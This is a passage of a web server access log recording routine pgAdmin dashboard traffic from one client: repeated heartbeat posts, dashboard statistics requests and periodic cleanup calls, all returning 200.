267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:33:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:33:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:34:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:34:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:35:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:35:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:36:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:36:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:37:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:37:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:37:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:38:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:38:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:39:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:39:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:40:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:40:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:41:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:41:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:42:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:42:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:42:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:43:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:43:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:44:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:44:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:45:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:45:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:46:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:46:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:47:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:47:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:47:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:48:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:48:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:49:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:49:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:50:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:50:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:51:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:51:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:52:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:52:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:52:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:53:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:53:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:54:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:54:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:55:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:55:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:56:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:56:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:57:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:57:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:57:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:58:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:58:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:59:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:59:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:00:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:00:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:01:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:01:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:02:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:02:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:02:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:03:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:03:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:04:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:04:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:05:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:05:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:06:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:06:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:07:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip 